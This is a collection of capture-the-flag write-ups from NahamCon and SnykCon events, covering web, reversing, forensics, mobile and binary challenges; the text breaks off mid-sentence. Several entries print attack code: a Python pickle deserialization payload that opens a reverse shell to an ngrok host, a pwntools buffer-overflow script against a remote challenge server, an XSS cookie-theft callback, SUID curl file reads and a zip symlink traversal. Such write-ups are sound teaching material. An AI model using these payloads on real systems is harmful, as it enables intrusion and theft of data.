| 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/30535159-715f-4628-8251-7cfbc94fb022) 4 | 5 | When checking the source code of this web application, I noticed a large blob in the HTTP response in BurpSuite: 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/02c0e735-6415-49e6-8b89-70df0069379b) 8 | 9 | Scrolling all the way down, we can see it's actually javascript. I tried multiple ways to run it, in the browser console, beautifying it and running it in online parsers but the output was too large and I couldn't get all of it. 10 | 11 | So I resorted to saving it locally in a file and changing it a bit to print the code: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0431ba0a-a95a-478f-abd8-2c29a654f0a5) 14 | 15 | Then I used node to run the javascript and redirect the output to a file. Again, there was a lot of content (garbage) but doing a simple CTRL+F helps us find the flag: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6aba3aaf-8460-471a-a26e-53c0ec18162f) 18 | 19 | flag{8084e4530cf649814456f2a291eb81e9} 20 | -------------------------------------------------------------------------------- /Nahamcon-2023/Warmups/Online_Chatroom.md: -------------------------------------------------------------------------------- 1 | # Online Chatroom 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/250d063c-9781-4609-a39d-ab83e43d2a1f) 4 | 5 | For this challenge, we get the source code of a Go binary. We notice some chat messages going on and the flag is within the chat history of user 5. 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/211730c1-8070-4b84-9fd9-6cc1ace0c115) 8 | 9 | Sending a simple message in the web application: 10 | 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fb992564-1a32-4de9-8c18-b2dfe236ac10) 12 | 13 | And intercepting it with Burpsuite, we notice it is using websockets: 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/58b00757-2dfd-4ed4-87e8-8f6b96b9632c) 16 | 17 | In the source code, we notice another command other than `!write`. We notice we can query the chat history using `!history`. After sending the request to Repeater, we see we need to provide an index from 1 to 7. 18 | 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c85a6b86-7c69-4915-bee7-c71f62b77653) 20 | 21 | Well, what happens if we query outside of that range? 22 | 23 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d2255c17-256e-4bc3-80a7-12229e5cb36e) 24 | 25 | We get the flag: flag{c398112ed498fa2cacc41433a3e3190b} 26 | -------------------------------------------------------------------------------- /Nahamcon-2023/Web/Star_Wars.md: -------------------------------------------------------------------------------- 1 | # Star Wars 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5ff560df-35ba-4b8f-b713-2508a4a03b06) 4 | 5 | For this website, we can signup for an acccount and then log in. When we do, we see we can post comments and it says that the admin will review it (smells like XSS). 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e3a9f5e4-e037-4d93-ad78-4acfc222e708) 8 | 9 | I used this XSS payload to callback to my VPS: 10 | 11 | ```javascript 12 | 13 | ``` 14 | 15 | The page reloads right away so we get hits from ourselves but one of them is the admin: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/77ffc0b5-1647-45d9-8384-6c8004a36074) 18 | 19 | This is confirmed by ID 1 after decoding it with flask-unsign. We can now use this cookie and go on the standard `/admin` endpoint. This was an educated guess for me but it can easily be discovered with some quick fuzzing. 20 | 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b211d5c0-a700-4979-b8d9-cb5a601ba9d9) 22 | 23 | flag{a538c88890d45a382e44dfd00296a99b} 24 | 25 | PS: I'm not sure why this was classes as Medium when Marmalade was originally classes as Easy. Such is life. 26 | -------------------------------------------------------------------------------- /Nahamcon-2024/Malware/Perfectly_Legit_Crypto_Casino.md: -------------------------------------------------------------------------------- 1 | ## Perfectly Legit Crypto Casino 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4bb4e1f5-21bf-4016-8344-a4bb3daadaf5) 4 | 5 | ## Enumeration 6 | 7 | The provided zip archive contains an Electron application: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c9f05b88-1381-40cb-862d-e7e1e658f210) 10 | 11 | The source code for such applications can be found in the `app.asar` file: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/734dea58-6655-4119-8685-70dff39d1c47) 14 | 15 | ## Solution 16 | 17 | We could've decompiled it but simply running strings was sufficient to find this interesting line: 18 | 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/37260e10-4177-44eb-a1b0-7c189f1c87ab) 20 | 21 | After running that in the terminal we get our flag: 22 | 23 | ```bash 24 | echo U2FsdGVkX18dLoy5VJmru0jW8cEVgMQS5JYhHSk8D369laaZ7d7nBJXslDqS4CFoqIfwoKGM6Urhmx079RXgIA== | openssl enc -aes-256-cbc -d -a -pass pass:infected 25 | ``` 26 | 27 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/99aa3739-dc9c-4e01-b670-b3d42a29c63e) 28 | 29 | `flag{6d0560223d733e5a6761476f8d23b4e3}` 30 | -------------------------------------------------------------------------------- /Nahamcon-2024/Misc/Not_Quite_The_Same.md: -------------------------------------------------------------------------------- 1 | ## Not Quite The Same 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/facc11d7-1a12-4f97-b14a-63d529613f19) 4 | 5 | ## Solution 6 | 7 | Based on the challenge description I immediately knew that this was about hash collision. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b79f13f-1dd2-42e5-b5c9-c89c8cea0562) 10 | 11 | I knew of a good Github Repo that explains it very well, and includes very helpful examples. Including PNG images. 12 | 13 | https://github.com/corkami/collisions?tab=readme-ov-file#png 14 | 15 | We can download the Sega and Nintendo PNGs: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5cf04a08-d5c1-48af-8884-e01c796e9268) 18 | 19 | https://github.com/corkami/collisions/blob/master/examples/collision1.png 20 | https://github.com/corkami/collisions/blob/master/examples/collision2.png 21 | 22 | Upload them and get the flag: 23 | 24 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b8f2e14a-feca-42c5-9402-879329d91839) 25 | 26 | `flag{0800fc577294c34e0b28ad2839435945}` 27 | -------------------------------------------------------------------------------- /Nahamcon-2024/Mobile/Buggy_Jumper_1.md: -------------------------------------------------------------------------------- 1 | ## Buggy Jumper 1 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7bef5be1-e407-45a7-a12c-23e54c90b745) 4 | 5 | ## Enumeration 6 | 7 | While looking through the source code, we see multiple mentions of Godot and find this `flag.gdc` file. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8a4179b3-1c98-40cf-a962-cdd2ce9e209b) 10 | 11 | But it seems to be a binary file so we can't just read it. I asked ChatGPT for some clarification and it confirmed what I thought: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/68abb4ce-16b8-41ff-af02-0b22b7e4e53d) 14 | 15 | We are dealing with a Godot compiled code that we need to decompile. 16 | 17 | ## Solution 18 | 19 | I found [this](https://github.com/bruvzg/gdsdecomp/releases) great precompiled tool on github. I ran it and opened the `flag.gdc` and selected the latest bytecode version from the drop down list: 20 | 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d2be83f2-6b3f-4808-95c8-7fb6eaa55bef) 22 | 23 | It decompiled it and now we can read it and get the flag: 24 | 25 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0f5b4d82-3cd9-445e-9198-79ad84411bfa) 26 | 27 | `flag{c2d5a0c9cae9857a3cfa662cd2869835}` 28 | -------------------------------------------------------------------------------- /Nahamcon-2024/Mobile/Fly_Away_1.md: -------------------------------------------------------------------------------- 1 | ## Fly Away 1 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5cc20df8-48cd-427d-9a6c-27a45408ea2e) 4 | 5 | ## Solution 6 | 7 | I used [this](https://appetize.io/) website, made an account with a 10 minute mail, loaded the app, tried to get a random lyric and found the flag in the first request it made that I could see in the Network log. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ef3e73ff-e940-4c13-9fd5-6907e19730de) 10 | 11 | `flag{5949f48d478612cc78a32a71a6643922}` 12 | -------------------------------------------------------------------------------- /Nahamcon-2024/Mobile/Kitty_Kitty_Bang_Bang.md: -------------------------------------------------------------------------------- 1 | ## Kitty Kitty Bang Bang 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ea47c22f-ddb6-4d03-a501-16327e4bd7fa) 4 | 5 | ## Enumeration 6 | 7 | We can use `jadx` to decompile the provided apk file. 8 | 9 | ```bash 10 | jadx -d ~/LAB/CTFs/NahamCon-2024/mobile/decompiled ~/LAB/CTFs/NahamCon-2024/mobile/com.nahamcon2024.kittykittybangbang.apk 11 | ``` 12 | 13 | From the source code we can see that it is outputting the flag into the log when tapping the screen: 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/15184cfd-7d95-48ed-9b6b-2818d068d59a) 16 | 17 | ## Solution 18 | 19 | So I used [this](https://appetize.io/) website, made an account with a 10 minute mail, turned ON the ADB Tunnel: 20 | 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/adf9414a-08dd-4319-b957-ebaecd02851d) 22 | 23 | Then locally, on my kali machine I started `adb logcat` grepping for the flag while clicking in the application to have the cat go bang a bunch of time. 24 | 25 | ```bash 26 | adb logcat | grep -oE 'flag{.*}' 27 | ``` 28 | 29 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d071114a-b623-436c-bd57-b3bce45eb4da) 30 | 31 | After a few taps, we've found the flag: 32 | 33 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9eaa0ffd-bb1a-4dd0-b74f-d49e0350cc5c) 34 | 35 | `flag{f9028245dd46eedbf9b4f8861d73ae0f}` 36 | -------------------------------------------------------------------------------- /Nahamcon-2024/Others/Basics.md: -------------------------------------------------------------------------------- 1 | ## Ring Cycle 1 - Basics 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3fbc2fee-ee13-4896-be1c-bd2f34b66e18) 4 | 5 | ## Enumeration 6 | 7 | This challenge is the first one in the Ring Cycle Challenge Group which is focused on reversing. I'm not much into reverse engineering but I will often take a quick look at the dangling fruits. 8 | 9 | I took the provided binary and uploaded it into [dogbolt](https://dogbolt.org/). I was too lazy to start up ghidra for this so I used this online webservice. It's great for quick and small binaries. 10 | 11 | We can already see some hex values that should be interesting: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/485ac12f-383d-4bce-8ca1-b172670e85fb) 14 | 15 | The binary is expecting a passphrase from us and it is comparing it with this value. I slapped the values into Cyberchef, swapped endianess and hex decoded it: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4a8bc417-0366-4503-ad3f-855a4817d2a4) 18 | 19 | ```text 20 | You are ready to start your safe cracking journey 21 | ``` 22 | 23 | ## Solution 24 | 25 | Gave the passphrase to the binary and got the flag: 26 | 27 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b392e689-01fb-425e-b131-450ed23e91f8) 28 | 29 | `flag{8562e979f1f754537a4e872cc20a73e8}` 30 | -------------------------------------------------------------------------------- /Nahamcon-2024/Others/Indicium.md: -------------------------------------------------------------------------------- 1 | ## Indicium 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2ae8c9f4-853b-45e6-b671-bf14cbbe3120) 4 | 5 | ## Enumeration 6 | 7 | We can easily recognize the string above as being Decimal encoding so we can use [cyberchef](https://gchq.github.io/CyberChef/) to decode it: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7479fd03-ce0b-4b4e-98a6-0073cf4bd0e2) 10 | 11 | Interestingly enough, we get another string that is not recognized by cyberchef: `gmbh|cc265ceg113b731ec768c9eg95b98175~` 12 | 13 | However, we know the flag format needs to start with `flag` but this one starts with `gmbh`. A keen eye would observe that `g` is the next letter after `f`, `m` is one letter after `l`, `b` is `a` + 1 and `h` is `g` + 1. 14 | 15 | ## Solution 16 | 17 | If we apply the same logic to the entire string, we need to decrease 1 from all the letters and we can easily do so with python. 18 | 19 | ```python 20 | input_string = "gmbh|cc265ceg113b731ec768c9eg95b98175~" 21 | transformed_string = "" 22 | 23 | for char in input_string: 24 | transformed_string += chr(ord(char) - 1) 25 | 26 | print(transformed_string) 27 | ``` 28 | We run it and get the flag. 29 | 30 | `flag{bb154bdf002a620db657b8df84a87064}` 31 | -------------------------------------------------------------------------------- /Nahamcon-2024/Others/Secret_Info.md: -------------------------------------------------------------------------------- 1 | ## Secret Info 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/dfa54ef7-0c3d-4fa5-94b7-42b6cce36f27) 4 | 5 | ## Enumeration 6 | 7 | For this challenge, I built the docker using the provided source code. I logged into the administration panel to see where the file is located. Within the docker, the file was accessible publicly from: 8 | 9 | `/wp-content/uploads/2024/05/flag_secret_not_so_random_get_me_1337.png` 10 | 11 | ## Solution 12 | 13 | Turns out that the same is valid for the challenge instance as well. 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2df5d203-0bfd-49fb-a549-46d19185dff3) 16 | 17 | `CTF{it_is_a_feature_by_core_xd}` 18 | 19 | Note: I didn't understand the point of this challenge. It felt lazy and a missed opportunity to do something with a potentially cool wordpress plugin. 20 | -------------------------------------------------------------------------------- /Nahamcon-2024/README.md: -------------------------------------------------------------------------------- 1 | Nahamcon CTF delivered yet again on some great challenges. This year I played with my new team and we finished 55/3826 teams. That's top 1.4% of the teams. 2 | 3 | ![nahamcon-2024](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3675bf4e-fb04-4157-99ad-c3cdb2dca2f7) 4 | -------------------------------------------------------------------------------- /Nahamcon-2024/Rev/Locked_Box.md: -------------------------------------------------------------------------------- 1 | ## Locked Box 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a32b2766-4dd3-4f20-8e0a-eb617f212198) 4 | 5 | ## Solution 6 | 7 | This challenge provides us a Makeself self extracting bash script: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1e702c84-c3ac-44b2-b037-eb12c05a8860) 10 | 11 | For such scripts, we can carve out the archive itself skipping the first 715 lines because we can see the bytes starting from line 716. 12 | 13 | ```bash 14 | tail -n +715 thebox > archive 15 | ``` 16 | 17 | We confirm that we extracted the archive: 18 | 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/09dcb410-6efd-4159-a827-1a97ab5b5e44) 20 | 21 | 22 | The python script from within the archive again contains a lot of flags: 23 | 24 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2befbf04-778e-4e76-b391-8b8cb72705db) 25 | 26 | But we just need to run it and it will print the flag: 27 | 28 | `flag{3a50c5e41a1c3eee6dcddca9e04992e0}` 29 | -------------------------------------------------------------------------------- /Nahamcon-2024/Rev/Whats_In_The_Box.md: -------------------------------------------------------------------------------- 1 | ## What's in the Box? 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/995b2656-72fd-4206-99c4-d46827c290e9) 4 | 5 | ## Solution 6 | 7 | This challenge provides us a Makeself self extracting bash script: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cb72e5eb-617f-46e4-8384-ef91e0d401dc) 10 | 11 | For such scripts, we can carve out the archive itself skipping the first 715 lines because we can see the bytes starting from line 716. 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b7ccbc78-68eb-4743-863f-c9cd221b9e89) 14 | 15 | ```bash 16 | tail -n +715 thebox > archive 17 | ``` 18 | And now we've taken it ou manually. I had to do this because I kept getting python related errors and I was too lazy to resolve them. But we confirmed we extracted the archive: 19 | 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fd40f0e4-d6fd-4c67-b388-0491b63a3584) 21 | 22 | The archive contains a python script that starts with a lot of flags: 23 | 24 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/55de4c1b-981a-445f-8c1d-68cae5819beb) 25 | 26 | Then ends with some more, but based on the code, we don't need to do anything other than run it, give it the hardcoded pin code and it should spit out the correct flag: 27 | 28 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5c9c92aa-4714-4a96-aed8-0da34be485f3) 29 | 30 | And we are correct: 31 | 32 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/81cd2352-5713-4183-bd26-6c937c05b47e) 33 | 34 | `flag{da0a0a25f5b35fbf99e3351997bfc4c8}` 35 | -------------------------------------------------------------------------------- /SnykCon2021/All your flags are belong to root/Writeup.md: -------------------------------------------------------------------------------- 1 | # All your flags are belong to root 2 | 3 | 4 | When using curl to download linpeas, I noticed the group owner was changed to root instead of the regular user I was on the box with. 5 | 6 | Checking the curl permissions, it looks like it has an SUID bit set. So I can use the file read from GTFOBins to read the flag which is in the root directory 7 | 8 | ```bash 9 | LFILE=/flag 10 | curl file://$LFILE 11 | ``` 12 | ![image](https://user-images.githubusercontent.com/80063008/136172237-db11ec2a-5ffe-45e9-932b-bc990df52a6a.png) 13 | 14 | 15 | SNYK{06b0e0ae4995af71335eda2882fecbc5008b01d95990982b439f3f8365fc07f7} 16 | -------------------------------------------------------------------------------- /SnykCon2021/ElectronBuzz/Writeup.md: -------------------------------------------------------------------------------- 1 | # ElectronBuzz 2 | 3 | This was probably the unintended way of getting the flag because it was super easy however despite that, the challenge had very few solves. The expected way was probably to reverse engineer or decompile it. 4 | 5 | We were given the option to download an installer either for MacOS (.dmg), for Windows (.exe) or Linux (.deb). 6 | 7 | I downloaded the .exe app and installed it in Windows. 8 | 9 | Went in the location where it was installed and opened various files in Notepad++. 10 | 11 | In the resources folder, there was a file called app.asar which contained the hardcoded flag 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/136174633-5252cb01-a415-45f7-944f-75dae64f6153.png) 14 | 15 | 16 | Flag: SNYK{07cd77795145aa60a36693f31fcf660c4f1ff2bae64e084fc1bbbc3affcc51eb} 17 | -------------------------------------------------------------------------------- /SnykCon2021/Magician/Writeup.md: -------------------------------------------------------------------------------- 1 | # Magician 2 | 3 | 4 | Main page asks for a word and the MD5 of that must match the one given. But there aren't 3 equal signs so it's not mandatory for it to be exact. 5 | 6 | ![image](https://user-images.githubusercontent.com/80063008/136171626-c508eb84-d8ba-4cc2-a56f-41d50640adb8.png) 7 | 8 | 9 | This reminded me of John Hammonds Magic Hashes. https://github.com/JohnHammond/ctf-katana#php 10 | 11 | I searched for a hash beginning with the first 3 characters in the given hash and found the word GGHMVOE 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/136171710-10ee5845-0f36-4f76-b1c5-94b6b56cd20b.png) 14 | 15 | 16 | Flag: SNYK{5fcde70181e9a9e3b26d014635e125a62899f337b84bb5ac8b7370efdf5bb506} 17 | -------------------------------------------------------------------------------- /SnykCon2021/README.md: -------------------------------------------------------------------------------- 1 | I participated in Snyk Fetch the Flag 2021 and ended up 57th out of 548 teams. That's top 10.4%. Not bad for 10 hours of staring at a screen. 2 | 3 | Here are my writeups to the challenges I solved. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/137868021-14582e3c-cc5d-4991-88ac-fced6e6d454a.png) 6 | ![image](https://user-images.githubusercontent.com/80063008/137868031-96f7d71e-1d8f-4ade-827b-53e082f361a6.png) 7 | -------------------------------------------------------------------------------- /SnykCon2021/Robert Louis Stevenson/Writeup.md: -------------------------------------------------------------------------------- 1 | # Robert Louis Stevenson 2 | 3 | The challenge gives you a tar file to download. 4 | 5 | Tar file which in turn gets unarchived to several layers and eventually the flag is found in here. 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/136172921-c116b054-401d-4014-9ffa-8bc9100f4870.png) 8 | 9 | Flag: SNYK{23acc4111e1905ba1832cab7f1660284e3d1b91d3c2ead7bcec41ee8a4bd5ce9} 10 | -------------------------------------------------------------------------------- /SnykCon2021/Sauerkraut/Writeup.md: -------------------------------------------------------------------------------- 1 | # Sauerkraut 2 | 3 | Page opened to two simple boxes: 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/136170679-cd9502f4-fbda-48cb-a3d2-973b85044d91.png) 6 | 7 | Entering random text gets me an error 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/136170774-6e12ee62-2b02-478d-b882-5d864fb91848.png) 10 | 11 | While googling that I find it is given by a python module called Pickle. Which makes sense considering the title of the challenge references something else that's pickled. Googled around until I found a python script to help https://davidhamann.de/2020/04/05/exploiting-python-pickle/. 12 | 13 | I modified it with my own unpickled script to get a reverse shell. Gets me a base64 string I put into the box and while having ngrok and netcat listening, I got a reverse shell then read the flag. 14 | 15 | ```python 16 | 1 import pickle 17 | 2 import base64 18 | 3 import os 19 | 4 20 | 5 21 | 6 class RCE: 22 | 7 def __reduce__(self): 23 | 8 return (os.system, ('bash -c "bash -i >& /dev/tcp/2.tcp.ngrok.io/11352 0>&1"',)) 24 | 9 25 | 10 26 | 11 if __name__ == '__main__': 27 | 12 pickled = pickle.dumps(RCE()) 28 | 13 print(base64.urlsafe_b64encode(pickled)) 29 | ``` 30 | 31 | Flag: SNYK{6854ecb17f51afdf2610f741dd07bd6099c616e4ab1a403eb14fa8639e1fb0af} 32 | 33 | -------------------------------------------------------------------------------- /SnykCon2021/Zip Viewer/Writeup.md: -------------------------------------------------------------------------------- 1 | 2 | # Zip Viewer 3 | 4 | Trying to upload a jpeg image I get this error message. It is unzipping the file you give it and then you can open it. 5 | 6 | ![image](https://user-images.githubusercontent.com/80063008/136174211-9703e9d5-d697-4825-90d1-99d4ec35c431.png) 7 | 8 | Tried multiple things however creating a symlink is what worked: https://book.hacktricks.xyz/pentesting-web/file-upload#symlink 9 | 10 | This is usually known as Zip Slip. 11 | 12 | On my machine I first created a file that was symlinked to the root, by going back a few folders and then going for the flag, assuming it is in root as it was in other challenges in this CTF. 13 | 14 | ```bash 15 | ln -s ../../../../../flag symflag.txt 16 | ``` 17 | Compressed the file using the --symlinks argument and then upload it. Clicked on the symlinked file and got the flag. 18 | ```bash 19 | zip --symlinks getflag.zip symflag.txt 20 | ``` 21 | 22 | 23 | ![image](https://user-images.githubusercontent.com/80063008/136174276-f5c1f9a5-7151-4465-8a2a-e1fa444ea9fb.png) 24 | ![image](https://user-images.githubusercontent.com/80063008/136174285-fb8ea7a7-3336-4a40-b52a-52d1d7cb7eea.png) 25 | ![image](https://user-images.githubusercontent.com/80063008/136174294-66738ada-6423-492a-a4e2-e0449a30175d.png) 26 | 27 | 28 | 29 | 30 | 31 | 32 | Flag: SNYK{d099a4c87b9ff06beabc0eb5ee186b93133fb2a9fff8d55582f932d1def8942c} 33 | -------------------------------------------------------------------------------- /SnykCon2021/qrrr/Writeup.md: -------------------------------------------------------------------------------- 1 | 2 | # qrrr 3 | 4 | We are given a picture of a QR code. 5 | 6 | ![image](https://user-images.githubusercontent.com/80063008/136173535-423a8857-3945-4d68-b7d3-286db97e7188.png) 7 | 8 | 9 | └─$ zbarimg flag.png 10 | QR-Code:5ff8d4e4958d8007a3897} 11 | 12 | Zbarimg sees the end of a potential flag given the curly brace. 13 | 14 | Put the the file into stegsolve.jar and navigated through all the layers. 15 | 16 | Found another two qr codes: 17 | 18 | ![image](https://user-images.githubusercontent.com/80063008/136173554-055fb13f-1d4f-44ac-965a-d07b549d1325.png) 19 | 20 | 21 | └─$ zbarimg solved.bmp 22 | QR-Code:12d99aa3a92f1abbb7d40786 23 | 24 | And 25 | 26 | ![image](https://user-images.githubusercontent.com/80063008/136173577-f5eb1cae-2e2c-4c41-989b-277055a40915.png) 27 | 28 | 29 | └─$ zbarimg solved2.bmp 30 | QR-Code:SNYK{6947bd4818ffc1768f2 31 | 32 | Putting the three together we get the flag. 33 | 34 | 35 | Flag: SNYK{6947bd4818ffc1768f212d99aa3a92f1abbb7d407865ff8d4e4958d8007a3897} 36 | -------------------------------------------------------------------------------- /SnykCon2025/Binary_Exploitation/Echo.md: -------------------------------------------------------------------------------- 1 | # Echo 2 | ![image](https://github.com/user-attachments/assets/738bbf96-b399-4093-9954-a7a0f7dd091d) 3 | 4 | Attachment: [echo](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/echo) 5 | 6 | ## Writeup 7 | 8 | I start by decompiling the binary in Ghidra and can see the main function with 128 bytes buffer: 9 | 10 | ![image](https://github.com/user-attachments/assets/63a1d38d-a92e-4d42-aeb6-b6d6f8ef5e2f) 11 | 12 | There's also a win function that reads the flag: 13 | 14 | ![image](https://github.com/user-attachments/assets/f1ef9c51-b81a-4d49-b84a-edcf0691e635) 15 | 16 | This is a standard ret2win type challenge which I solved with this script: 17 | 18 | ```python 19 | from pwn import * 20 | 21 | # Define the target binary 22 | binary = './echo' 23 | elf = ELF(binary) 24 | 25 | prog = remote('challenge.ctf.games', 31084) 26 | 27 | # Argument to pass to the binary 28 | payload = b'A' * 136 29 | payload += p64(elf.symbols['win']) # Overwrite the return address with the win function address 30 | 31 | prog.recvline() 32 | prog.sendline(payload) 33 | prog.interactive() 34 | ``` 35 | 36 | ![image](https://github.com/user-attachments/assets/c7d168c8-e926-45ef-aabf-a645817b65fe) 37 | 38 | flag{4f4293237e37d06d733772a087299f17} 39 | -------------------------------------------------------------------------------- /SnykCon2025/Forensics/ClickityClack.md: -------------------------------------------------------------------------------- 1 | # ClickityClack 2 | ![image](https://github.com/user-attachments/assets/86b16f6a-aea9-4d24-bfde-d1e35b45d47e) 3 | 4 | Attachment: [click.pcapng](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/click.pcapng) 5 | 6 | ## Writeup 7 | 8 | I have solved multiple CTF challenges related to USB keyboard capture so I used this very helpful [USB Keyboard Parser](https://github.com/5h4rrk/CTF-Usb_Keyboard_Parser) where I can just pass the pcap capture to it and it decodes all the key strokes and I get the flag. 9 | 10 | ![image](https://github.com/user-attachments/assets/ffd0917c-4ca5-4829-9ca0-5829e0f280db) 11 | 12 | flag{a3ce310e9a0dc53bc030847192e2f585} 13 | -------------------------------------------------------------------------------- /SnykCon2025/Forensics/Free_Range_Packets.md: -------------------------------------------------------------------------------- 1 | # Free Range Packets 2 | ![image](https://github.com/user-attachments/assets/63ae93ae-baa5-45f3-95f4-1a8552e83f42) 3 | 4 | Attachment: [freeRangePackets.pcapng](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/freeRangePackets.pcapng) 5 | 6 | ## Writeup 7 | 8 | Based on the challenge description, I knew I had to carve out the btl2cap field from the capture file. With tshark and some further grepping and cutting I can eventually cleanly get the flag out. 9 | 10 | ```bash 11 | tshark -r freeRangePackets.pcapng -Y 'btl2cap.payload' -T fields -e btl2cap.payload 2>/dev/null|grep -v '09ff01065c'|cut -c 7-|cut -c 1-2|xxd -r -p 12 | ``` 13 | 14 | ![image](https://github.com/user-attachments/assets/d65af82d-4199-45f5-baa1-e946bf8670d9) 15 | 16 | 17 | flag{b5be72ab7e0254c056ffb57a0db124ce} 18 | -------------------------------------------------------------------------------- /SnykCon2025/README.md: -------------------------------------------------------------------------------- 1 | I participated solo in Snyk Fetch the Flag 2025 and ended up 21st out of 1201 teams. Technically, the first 1-19th teams were tied for 1st, 20th place is 2nd and I'm 3rd. Technically :grin:. 2 | 3 | Here are my writeups to the challenges I solved. 4 | 5 | ![image](https://github.com/user-attachments/assets/324de0ce-3d39-4129-9196-8eaaeb7c9d86) 6 | -------------------------------------------------------------------------------- /SnykCon2025/Rev/An_Offset_Among_Friends.md: -------------------------------------------------------------------------------- 1 | # An Offset Among Friends 2 | ![image](https://github.com/user-attachments/assets/dc432c53-3950-4573-b8ff-bab7926bed2e) 3 | 4 | Attachment: [an-offset](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/an-offset) 5 | 6 | ## Writeup 7 | 8 | A quick decompiling in [dogbolt](https://dogbolt.org/) and we can see what looks like a jumbled flag: 9 | 10 | ![image](https://github.com/user-attachments/assets/c0a1c737-10c7-4cde-a36d-f57f26fea2a8) 11 | 12 | I recognize this as being rotated, but unlike ROT13, the special characters of curly braces are rotated as well so we can use ROT47 from Cyberchef: 13 | 14 | ![image](https://github.com/user-attachments/assets/ff5263da-ee8a-4adf-939d-139dc1891754) 15 | 16 | https://gchq.github.io/CyberChef/#recipe=ROT47(-1)&input=Z21iaHxkNjU0MjY1OTM2NDJkMjJiODdiZmJiOTM5ZjU0OTE4ZH4&oeol=VT 17 | 18 | flag{c54315482531c11a76aeaa828e43807c} 19 | -------------------------------------------------------------------------------- /SnykCon2025/Rev/Either-Or.md: -------------------------------------------------------------------------------- 1 | # Either Or 2 | ![image](https://github.com/user-attachments/assets/bdc998cf-a53e-443a-beab-99366b66fb82) 3 | 4 | Attachment: [either-or](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/either-or) 5 | 6 | ## Writeup 7 | 8 | I decompiled this quickly in [dogbolt](https://dogbolt.org/) and saw a string the main function that I recognized to be rotated. Specifically ROT13. 9 | 10 | ![image](https://github.com/user-attachments/assets/af444656-be6d-4053-aa0a-3e65e46e7ac3) 11 | 12 | Copied the value and rotated it in 